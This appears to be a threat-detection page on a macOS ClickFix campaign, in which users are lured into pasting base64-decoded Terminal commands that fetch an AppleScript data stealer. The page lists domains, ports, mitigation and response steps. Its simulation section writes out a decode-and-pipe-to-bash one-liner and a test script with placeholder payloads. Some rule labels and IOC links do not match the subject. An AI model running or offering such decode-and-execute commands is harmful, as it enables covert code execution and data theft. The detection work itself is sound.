Clickfix on macOS: AppleScript Malware Campaign Uses Terminal Prompts to Steal Data
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The AppleScript malware campaign targets macOS users via a ClickFix technique by persuading them to manually execute base64-decoded shell commands in Terminal. These commands retrieve an AppleScript stealer that harvests browser data, cryptocurrency wallets, local documents, and other sensitive information, then exfiltrates it to attacker-controlled servers. Because no traditional binary is written to disk, the activity is harder to spot with classic AV. The operation relies on multiple deceptive domains and unusual service ports for command-and-control traffic.
AppleScript Campaign Analysis
Researchers examined the phishing websites, the JavaScript responsible for delivering the payload, and the AppleScript used for collection and exfiltration. Infrastructure mapping uncovered domains such as cryptoinfo-news.com and odyssey1.to, along with services exposed on ports 22, 80, 3333, and 5201. The AppleScript payload packages stolen data into a ZIP file at /tmp/out.zip and uses curl to upload it to a remote endpoint.
Mitigation
Defenders should block identified malicious domains and limit outbound connections on uncommon ports. Harden macOS hosts by restricting AppleScript and shell usage, monitoring for base64-d | bash execution patterns, and applying strict CORS controls in web environments. Security awareness training should highlight phishing pages that instruct users to copy-paste and run Terminal commands.
Response
When these indicator patterns are detected, notify the SOC, isolate the affected system, and capture temporary artifacts and shell history. Perform a forensic review of the /tmp directory, quarantine any suspicious ZIP archives, and correlate outbound traffic with the known C2 servers and ports identified in the campaign.
Attack Flow
Detections
Detect Malicious Use of Curl for Data Exfiltration on macOS [Windows Process Creation]
View
Detection of Base64 Decoding and Bash Execution on macOS [Linux Process Creation]
View
IOCs (SourceIP) to detect: The Complete Guide to Hunting Cobalt Strike – Part 2: 10+ HuntSQL Recipes to Find Cobalt Strike
View
IOCs (DestinationIP) to detect: The Complete Guide to Hunting Cobalt Strike – Part 2: 10+ HuntSQL Recipes to Find Cobalt Strike
View
Atomic MacOS Stealer – FileGrabber Activity
View
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative directly reflect the identified TTPs and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
-
The attacker sends a phishing email containing the one‑liner:
echo "cHJpbnQoJ0NhdXNlJykK" | base64 -d | bash(The payload decodes to
print('Cause')– a placeholder for any malicious Bash script.) -
An unsuspecting user copies the line and pastes it into Terminal.
-
macOS spawns a
bashprocess whose command line exactly matches the patternbase64 -d | bash, satisfying the Sigma rule’sselection. -
The Bash interpreter executes the decoded payload, completing the malicious action (e.g., establishing a reverse shell, downloading additional tools).
-
-
Regression Test Script: The script below automates steps 1‑3, reproducing the telemetry needed for validation.
#!/bin/bash # ------------------------------------------------- # Simulate macOS Base64‑decode‑and‑Bash execution # ------------------------------------------------- # Base64‑encoded payload (prints “Compromise”) PAYLOAD="cHJpbnQoJ0NvbXByb21pc2UnKQ==" # Execute the one‑liner exactly as an attacker would echo "$PAYLOAD" | base64 -d | bash # Exit with the status of the Bash command exit $? -
Cleanup Commands: Remove any temporary files or background processes that may have been created by the payload (replace with payload‑specific cleanup if needed).
#!/bin/bash # Simple cleanup – ensure no stray Bash child processes remain pkill -f "base64 -d | bash" 2>/dev/null # If the payload created files, delete them (example placeholder) rm -f /tmp/malicious_script.sh 2>/dev/null